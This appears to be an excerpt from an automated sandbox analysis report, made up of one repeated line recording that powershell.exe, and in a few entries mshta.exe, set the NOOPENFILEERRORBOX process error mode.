                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
